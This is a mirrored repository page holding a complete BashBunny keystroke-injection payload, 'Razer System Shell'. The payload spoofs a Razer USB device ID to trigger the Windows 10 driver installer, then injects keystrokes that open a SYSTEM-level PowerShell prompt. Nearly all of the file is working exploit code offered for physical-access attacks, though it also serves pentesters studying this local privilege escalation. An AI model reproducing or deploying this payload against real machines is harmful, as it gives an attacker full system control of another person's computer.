mirror of
https://github.com/hak5/bashbunny-payloads.git
synced 2025-10-29 16:58:25 +00:00
9fdacee185
Exploit Razer USA HID driver installation to System authority PowerShell. This is heavily based on Tweet by @_MG_ on 22nd Aug 2021 but modified to work with BashBunny
40 lines
1.3 KiB
Plaintext
40 lines
1.3 KiB
Plaintext
# Title: Razer System Shell
|
|
# Description: Exploit Razer USA HID driver installation to System authority PowerShell.
|
|
# This is heavily based on Tweet by @_MG_ on 22nd Aug 2021 but modified to work with BashBunny
|
|
# Author: Emptyhen
|
|
# Props: @_MG_, @Hak5Darren, @KalaniMakutu - Original Concept
|
|
Cribbit, NightGhost - Great suggestions to clean up the PoC.
|
|
# Version: 0.1
|
|
# Category: Execution
|
|
# Target: Windows 10 (Powershell)
|
|
# Attackmodes: Serial, HID
|
|
|
|
LED SETUP
|
|
|
|
# Serial isn't actually used but appears to be required to make the HID work correctly.
|
|
ATTACKMODE SERIAL HID VID_0X1532 PID_0X0064
|
|
|
|
# Long delay to allow the driver installation and wait for the Razer Synaptics to start up.
|
|
# Note this only happens after the driver is installed - to run this again, remove the Razer HID driver in Device Manager.
|
|
LED STAGE1
|
|
QUACK DELAY 40000
|
|
|
|
# Inject Keystrokes to Launch a Powershell Window.
|
|
LED STAGE2
|
|
QUACK SPACE
|
|
for run in {1..5}; do QUACK TAB; done
|
|
QUACK RIGHT
|
|
QUACK RIGHT
|
|
QUACK ENTER
|
|
QUACK DELAY 500
|
|
QUACK ALT D
|
|
QUACK STRING powershell
|
|
QUACK ENTER
|
|
|
|
# A 'nt autority\system' PowerShell prompt should get spawned.
|
|
LED STAGE3
|
|
QUACK DELAY 10000
|
|
QUACK STRING whoami
|
|
QUACK ENTER
|
|
|
|
LED FINISH |